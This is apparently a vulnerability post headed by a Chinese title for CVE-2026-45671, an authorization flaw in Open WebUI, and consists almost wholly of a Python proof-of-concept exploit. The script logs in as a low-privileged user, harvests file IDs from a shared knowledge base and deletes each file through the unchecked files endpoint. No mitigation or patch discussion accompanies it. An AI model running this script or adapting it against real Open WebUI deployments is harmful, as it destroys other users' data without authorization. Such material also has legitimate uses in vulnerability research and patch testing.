CVE-2026-45671 Open WebUI越权漏洞致文件删除

import requests # Configuration TARGET_URL = "http://localhost:3000" ATTACKER_EMAIL = "[email protected]" ATTACKER_PASSWORD = "password" def exploit(): session = requests.Session() # Step 1: Login as a low-privileged user print("[+] Logging in...") login_payload = { "email": ATTACKER_EMAIL, "password": ATTACKER_PASSWORD } login_resp = session.post(f"{TARGET_URL}/api/v1/auths/login", json=login_payload) if login_resp.status_code != 200: print("[-] Login failed") return token = login_resp.json().get("token") headers = {"Authorization": f"Bearer {token}"} # Step 2: Leak File UUIDs from a shared knowledge base # Assuming attacker has access to knowledge base ID 'kb_shared_123' kb_id = "kb_shared_123" print(f"[+] Attempting to leak file UUIDs from Knowledge Base: {kb_id}") files_resp = session.get(f"{TARGET_URL}/api/v1/knowledge/{kb_id}/files", headers=headers) if files_resp.status_code != 200: print("[-] Failed to access knowledge base files") return files = files_resp.json().get("files", []) print(f"[+] Found {len(files)} files.") # Step 3: Delete files via IDOR for file_info in files: file_uuid = file_info.get("id") filename = file_info.get("filename", "unknown") print(f"[*] Attempting to delete file: {filename} (UUID: {file_uuid})") delete_resp = session.delete(f"{TARGET_URL}/api/v1/files/{file_uuid}", headers=headers) if delete_resp.status_code == 200: print(f"[+] Successfully deleted file: {filename}") else: print(f"[-] Failed to delete file: {filename}") if __name__ == "__main__": exploit()